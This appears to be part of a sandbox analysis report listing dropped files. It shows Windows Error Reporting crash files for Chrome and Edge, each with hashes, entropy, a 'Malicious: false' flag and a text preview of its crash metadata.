SSDEEP:	96:b88qFviksrEoZGNfCQXIDcQic6ycEJcw3++HbHu2A2Z+ZwfZAX/d5FMT2SlPkpXj:ItAkb0c2TTj2zuiFWZ24lO89
MD5:	96FBB3ADFE4DD12DDCED6549595AC3EC
SHA1:	B15653634C3BE86D7CB31FAC5B8F47628CFE1FC4
SHA-256:	FF9CF536867EF094656555429223BFC56B43F54F37C760ADC6FAB97F2544ACF2
SHA-512:	9EDBAAC577E46811DA7443E029F3A38D5A549828BCB0FFE21666E76E10E2A63A91937303F1A9884C6DEEC1129A464F9100E34205511CD2CA291ED0C60F7C87C4
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.3.2.6.2.5.2.6.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.9.c.2.4.4.0.-.3.0.0.0.-.4.f.8.a.-.b.3.a.c.-.c.0.2.c.f.6.1.4.e.8.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.c.f.e.b.d.1.-.8.a.8.2.-.4.6.4.c.-.9.b.3.7.-.4.b.2.a.d.b.6.d.e.9.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.8.0.-.0.0.0.1.-.0.0.1.8.-.2.0.1.3.-.d.e.8.8.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.2.e.c.d.9.2.4.3.e.1.6.8.4.3.6.9.7.1.a.5.c.8.3.c.1.3.2.7.8.1.d.f.3.7.7.c.7.e.d.c.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_9075c3c4-a6e6-45ed-ade9-137bd9ff37d2\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7022332873377879
Encrypted:	false
SSDEEP:	96:Q8Dwkvi6KsrEoZGNfCQXIDcQic6ycEJcw3++HbHu2A2Z+ZwfZAX/d5FMT2SlPkpT:58z6Kb0c2TTj2zuiFWZ24lO89
MD5:	40A934CE3B7721C7A6EB9B1C770D6CA0
SHA1:	71FF931D791DC30501E9557889D51AC2D8A6C339
SHA-256:	D00CB52E089CD65AFA2A5951E8C6493EA0EF51ECA3AD12E73557F6C3904DA723
SHA-512:	5F5D8AF34B2B2073D1ECCD7CB88AF83A25311771ED55E0CAEA7097FA49C32006DDECCEB08CF286D03ABBAA6CF5FA7BDAF640945D705CD1C58335E65368E7F05A
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.4.7.1.4.4.6.3.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.7.5.c.3.c.4.-.a.6.e.6.-.4.5.e.d.-.a.d.e.9.-.1.3.7.b.d.9.f.f.3.7.d.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.e.7.4.5.0.e.-.4.b.0.6.-.4.9.b.5.-.8.4.f.7.-.8.7.6.3.c.8.5.3.2.1.7.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.c.0.-.0.0.0.1.-.0.0.1.8.-.d.5.c.0.-.d.0.9.1.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.2.e.c.d.9.2.4.3.e.1.6.8.4.3.6.9.7.1.a.5.c.8.3.c.1.3.2.7.8.1.d.f.3.7.7.c.7.e.d.c.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_3be725a7-7bec-402d-912c-5b6e1b4103ce\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7025360857948543
Encrypted:	false
SSDEEP:	96:T8aTekvi6KsrEodGNfBQXIDcQoc6OcEZcw3CAKGp+HbHu2A2Z+ZwfZAX/d5FMT25:Asez6KU0mKD6Jj2zuiFWZ24lO89
MD5:	E8762B61C2FF7AE8BB1A38A33982C73E
SHA1:	09DAE270E56B46216B1075A5D526207DBC9AD8C8
SHA-256:	4FE95B7998D77553D367B3201067F121FF7E7BBA7312AAD11795C2F533E214CF
SHA-512:	8F444A58BDCB881930F6CD6B434E98CEF9ECE69D40B7EE5C0E9732BCB94BD9E678AE30EAC34C397D8B2CAD06F80B3798C1CFBBA54CB6761588F3B5A5EB0AEED3
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.4.6.1.4.1.0.6.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.e.7.2.5.a.7.-.7.b.e.c.-.4.0.2.d.-.9.1.2.c.-.5.b.6.e.1.b.4.1.0.3.c.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.d.f.c.2.5.e.-.a.9.8.c.-.4.6.1.2.-.b.2.5.1.-.1.a.2.d.f.2.2.a.f.f.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.c.0.-.0.0.0.1.-.0.0.1.8.-.d.5.c.0.-.d.0.9.1.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.2.e.c.d.9.2.4.3.e.1.6.8.4.3.6.9.7.1.a.5.c.8.3.c.1.3.2.7.8.1.d.f.3.7.7.c.7.e.d.c.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_c2374def-a73f-4e01-95b4-340ccaa2b026\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7022732634432871
Encrypted:	false
SSDEEP:	96:k8RA8FviksrEodGNfBQXIDcQoc6OcEZcw3CAKGp+HbHu2A2Z+ZwfZAX/d5FMT2Sq:1R5AkU0mKD6Jj2zuiFWZ24lO89
MD5:	3AB705B0D0A607E5FBFDCD06F1AD2295
SHA1:	5CDA28540D347BA818E5CAF35A8A67C3FCF18E20
SHA-256:	148DF1162609666289F9EF6227C0D35E8A9C25A492B2BD9D17EE94BB9E65AB1A
SHA-512:	7B1814253AC2117CA5E9D5C44E7893D8500F925981F35D6A9AF4BDB36D3298208E86697F95B1E536C8A08382C60AF2A151D2FC3535257EAA2B33B0D3D6AB7FDD
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.3.1.2.7.5.7.6.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.3.7.4.d.e.f.-.a.7.3.f.-.4.e.0.1.-.9.5.b.4.-.3.4.0.c.c.a.a.2.b.0.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.3.0.a.f.4.5.-.e.6.f.d.-.4.b.1.a.-.9.4.1.3.-.b.1.7.1.2.3.0.7.1.4.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.8.0.-.0.0.0.1.-.0.0.1.8.-.2.0.1.3.-.d.e.8.8.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.2.e.c.d.9.2.4.3.e.1.6.8.4.3.6.9.7.1.a.5.c.8.3.c.1.3.2.7.8.1.d.f.3.7.7.c.7.e.d.c.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_d5b0c01f-b54c-461f-bcf0-11216f7d913a\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7025675765297896
Encrypted:	false
SSDEEP:	96:08prsvinsrEodGNfBQXIDcQoc6OcEZcw3CAKGp+HbHu2A2Z+ZwfZAX/d5FMT2Sl0:lVbnU0mKD6Jj2zuiFWZ24lO89
MD5:	9CF805539EA6B34E8A40AEA021AD33CC
SHA1:	4604A1BB379C019A60086D236A1611A4F3970C46
SHA-256:	FFB13E6F49E1BC5230D58A3D81A2C7947E0B4801A2CDFD8BBE2B1EF40C949980
SHA-512:	CE25F786702BAD9CC7327744E8D1D26DF48E210A551E01628C4F9058511F2CE5EF75D2B6F2200D04C56D9965F92D543D5402C323A6D92333DE797BBCB8D64FCF
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.3.9.0.8.6.8.0.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.b.0.c.0.1.f.-.b.5.4.c.-.4.6.1.f.-.b.c.f.0.-.1.1.2.1.6.f.7.d.9.1.3.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.8.6.f.3.2.b.-.a.0.6.4.-.4.8.5.f.-.b.1.6.f.-.2.3.2.c.e.7.6.7.9.f.a.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.c.h.r.o.m.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.h.r.o.m.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.8.c.-.0.0.0.1.-.0.0.1.8.-.2.f.3.8.-.9.e.8.d.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.b.e.e.b.f.9.6.7.c.b.7.5.7.3.a.a.9.7.d.c.2.a.8.8.f.1.7.f.f.3.c.5.0.0.0.0.f.f.f.f.!.0.0.0.0.2.e.c.d.9.2.4.3.e.1.6.8.4.3.6.9.7.1.a.5.c.8.3.c.1.3.2.7.8.1.d.f.3.7.7.c.7.e.d.c.!.c.h.r.o.m.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5././.0.2././.2.5.:.2.0.:.0.6.:.0.8.!.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_6e7a37746f818a347830ea1e976120e73daecf72_75709460_5165434c-287c-474f-a884-9d1a74be8407\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7210265242351945
Encrypted:	false
SSDEEP:	96:88aOLaEBsA2OoOkONf+QXIDcQ1c6uybcEAcw3RY+HbHwbZH3g4sFTDZAX/d5FMTd:taXEBbrj0rVKt5jqzuiFWZ24lO8p
MD5:	51E9B024A3CC3CE22584300352D7C9D9
SHA1:	F7E03FC4399CBBC58688CA184CFB7FB8491982FF
SHA-256:	97E52C7468124972F8273A8BFD319D0FF28BD025963B73311F3415CEAA33ABF7
SHA-512:	A6FBDA6199EF7A438B234697FA7515CD0EB5D609DF200CFF20D1BE717778C1C688E0E329123C6BDBBC9A706258D37084FCAC8A25B6315ABE07A66C68553F60DF
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.4.0.9.2.1.6.7.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.1.6.5.4.3.4.c.-.2.8.7.c.-.4.7.4.f.-.a.8.8.4.-.9.d.1.a.7.4.b.e.8.4.0.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.d.b.8.0.e.2.-.1.4.c.6.-.4.b.5.7.-.a.1.5.6.-.5.e.f.c.1.0.9.9.6.d.4.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.s.e.d.g.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.e.d.g.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.f.8.-.0.0.0.1.-.0.0.1.8.-.8.d.c.1.-.a.4.8.e.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.e.a.a.f.3.a.3.a.a.d.9.4.e.4.4.9.7.c.2.8.4.a.2.6.2.6.2.5.d.6.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.1.f.4.7.7.4.f.3.1.0.4.d.e.a.6.a.5.0.6.4.6.d.6.c.1.1.e.f.e.f.d.2.a.2.9.1.6.9.!.m.s.e.d.g.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.9././.2.8.:.2.0.:.5.1.:.5.0.!.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_6e7a37746f818a347830ea1e976120e73daecf72_75709460_b01ff826-0a9d-4c99-9877-b3edef4f4d6f\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7210211056921049
Encrypted:	false
SSDEEP:	96:f8OzeOLaE67tsA2OoOkONf+QXIDcQ1c6uybcEAcw3RY+HbHwbZH3g4sFTDZAX/dO:USeXE67tbrj0rVKt5jqzuiFWZ24lO8p
MD5:	08E621BC80388AEBEFBB8D883D9C4ED6
SHA1:	231EB3BE938C481EEF5464320D7BFA1DA77EB243
SHA-256:	14ACDF69D690294462F4B63F91487CF8120A7BEEA9AAA6275227E4CEA6EA7C7B
SHA-512:	0CDFDE9804BD8044AEA958A7D5D2D636E68A52219D42EB8A49B15D77AE2A0A56D4120B69F14D736B23A0BA63969EB33C0BA690953388208D1F72ACEFFCC67616
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.4.9.1.5.2.3.1.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.1.f.f.8.2.6.-.0.a.9.d.-.4.c.9.9.-.9.8.7.7.-.b.3.e.d.e.f.4.f.4.d.6.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.f.0.5.7.1.4.-.8.3.d.7.-.4.f.b.5.-.8.1.a.0.-.0.d.4.0.3.4.f.0.1.c.c.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.s.e.d.g.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.e.d.g.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.7.c.-.0.0.0.1.-.0.0.1.8.-.1.3.4.f.-.9.0.9.3.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.e.a.a.f.3.a.3.a.a.d.9.4.e.4.4.9.7.c.2.8.4.a.2.6.2.6.2.5.d.6.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.1.f.4.7.7.4.f.3.1.0.4.d.e.a.6.a.5.0.6.4.6.d.6.c.1.1.e.f.e.f.d.2.a.2.9.1.6.9.!.m.s.e.d.g.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.9././.2.8.:.2.0.:.5.1.:.5.0.!.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_6e7a37746f818a347830ea1e976120e73daecf72_75709460_b102db5d-74bf-4bf9-9096-aa63fdbc572a\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7212077065590612
Encrypted:	false
SSDEEP:	96:18q1lLaEOsA2OoOkONf+QXIDcQ1c6uybcEAcw3RY+HbHwbZH3g4sFTDZAX/d5FMJ:yq1AEObrj0rVKt5jqzuiFWZ24lO8p
MD5:	C4EDC7B79BD3B00C3E814C65DAEA2D91
SHA1:	1DF8C0AF43B957C58936A936B9579ED582D56245
SHA-256:	D9AFC22A6D876A18FE1E91B90C769F52B1F2F2ABC22AA60047EFF3B8D04C7E9C
SHA-512:	12E963CECC6654E961289E765C3027BBF4777E0B5FAA9261C551403B5B571E79A43B4F8A14D7B498B6FBE735E5A8AE45BB68CCFFDFEC6F888486A53B793E19A4
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.3.4.3.8.9.3.6.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.1.0.2.d.b.5.d.-.7.4.b.f.-.4.b.f.9.-.9.0.9.6.-.a.a.6.3.f.d.b.c.5.7.2.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.0.f.a.c.4.b.-.1.a.5.f.-.4.d.f.d.-.9.8.6.7.-.c.c.b.1.1.5.8.9.9.5.2.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.s.e.d.g.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.e.d.g.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.6.4.-.0.0.0.1.-.0.0.1.8.-.d.c.2.2.-.c.2.8.a.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.e.a.a.f.3.a.3.a.a.d.9.4.e.4.4.9.7.c.2.8.4.a.2.6.2.6.2.5.d.6.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.1.f.4.7.7.4.f.3.1.0.4.d.e.a.6.a.5.0.6.4.6.d.6.c.1.1.e.f.e.f.d.2.a.2.9.1.6.9.!.m.s.e.d.g.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.9././.2.8.:.2.0.:.5.1.:.5.0.!.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_b2183e612ae09e2d847ad213d2fdf44b96d97240_75709460_6cc951a1-00ca-4995-8233-9f6060a8e2f7\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7204060371498223
Encrypted:	false
SSDEEP:	96:58GVOLaEBsA2OoqkONf0QXIDcQcc6o6cEncw34+HbHwbZH3g4sFTDZAX/d5FMT2U:uGVXEBbPJ0yU6NVjqzuiFWZ24lO8p
MD5:	7033358D18191330F567F1E01923C92C
SHA1:	F1A0ECC3CBB0E2F4E10C8034AEEF0633B42E30F3
SHA-256:	F1F7FD6FF33C088CD25F3D73AEBCA295320E67854FF601E922F59DAF163100DE
SHA-512:	EF5388D5E6E2325E66A4BF001A6D0F03978EFAC45089C10275A3909A462CAFA6F28269D004C3E0027FCBF07AC2CEAFD70D3D3AE9BE4F7F43C74A752BB4F18653
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.4.1.5.8.3.6.8.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.c.c.9.5.1.a.1.-.0.0.c.a.-.4.9.9.5.-.8.2.3.3.-.9.f.6.0.6.0.a.8.e.2.f.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.8.9.c.d.2.b.-.4.f.1.7.-.4.e.3.7.-.8.0.2.7.-.a.5.6.1.c.2.1.7.e.b.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.s.e.d.g.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.e.d.g.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.f.8.-.0.0.0.1.-.0.0.1.8.-.8.d.c.1.-.a.4.8.e.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.e.a.a.f.3.a.3.a.a.d.9.4.e.4.4.9.7.c.2.8.4.a.2.6.2.6.2.5.d.6.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.1.f.4.7.7.4.f.3.1.0.4.d.e.a.6.a.5.0.6.4.6.d.6.c.1.1.e.f.e.f.d.2.a.2.9.1.6.9.!.m.s.e.d.g.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.9././.2.8.:.2.0.:.5.1.:.5.0.!.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_b2183e612ae09e2d847ad213d2fdf44b96d97240_75709460_7e0abad9-a362-4765-a520-880ef44139fd\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7203220701942665
Encrypted:	false
SSDEEP:	96:N89XlLaEOsA2OoqkONf0QXIDcQcc6o6cEncw34+HbHwbZH3g4sFTDZAX/d5FMT2U:q9XAEObPJ0yU6NVjqzuiFWZ24lO8p
MD5:	4CD5BCFC56218B3F8C526626D67D3369
SHA1:	779F52E85A34339EA6CAE6E8D7C8B1CB4B8E87B6
SHA-256:	8897284FAC4892520A4A5B1A5BDD064460F16168118EBCCC6BEEF149A6EEA450
SHA-512:	090C81BB1C9727E5EFCC1EDB236976AD5FDBA2876E6800B9C49CBC133C75CBB65F36BD8215929F4DE34784562E238807E872EA744EBCB8AA2BA5EE3B35981278
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.9.1.3.3.0.7.3.5.4.7.2.7.4.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.0.a.b.a.d.9.-.a.3.6.2.-.4.7.6.5.-.a.5.2.0.-.8.8.0.e.f.4.4.1.3.9.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.e.d.b.a.3.9.6.-.6.1.5.1.-.4.e.8.a.-.b.1.d.3.-.7.a.f.b.4.3.8.f.9.e.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.s.e.d.g.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.e.d.g.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.6.4.-.0.0.0.1.-.0.0.1.8.-.d.c.2.2.-.c.2.8.a.7.1.c.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.e.a.a.f.3.a.3.a.a.d.9.4.e.4.4.9.7.c.2.8.4.a.2.6.2.6.2.5.d.6.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.1.f.4.7.7.4.f.3.1.0.4.d.e.a.6.a.5.0.6.4.6.d.6.c.1.1.e.f.e.f.d.2.a.2.9.1.6.9.!.m.s.e.d.g.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.9././.2.8.:.2.0.:.5.1.:.5.0.!.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_b2183e612ae09e2d847ad213d2fdf44b96d97240_75709460_ce6506a8-9fc7-42cc-ba07-4b1639dcbce0\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7206237265433355
Encrypted:	false
